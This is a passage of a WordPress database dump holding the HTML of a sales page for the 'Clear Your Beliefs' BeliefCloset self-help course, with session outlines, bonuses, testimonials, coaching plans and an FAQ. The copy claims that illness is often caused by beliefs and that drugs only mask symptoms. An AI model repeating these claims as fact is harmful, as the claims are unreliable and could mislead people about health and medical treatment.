/>\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<div class="icons">\r\n<div class="icon_box">\r\n<div class="icon a1"></div>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<div class="icon a3"></div>\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n\r\n</div>\r\n</div>\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 14:15:01', '2014-06-17 19:15:01', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(922, 4194, '2014-06-17 14:18:08', '2014-06-17 19:18:08', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="wp-image-300 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="wp-image-316 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 50px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" were created by your beliefs.\r\nWhen you learn to change your beliefs at will, your possibilities are unlimited!</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n<h1></h1>\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a 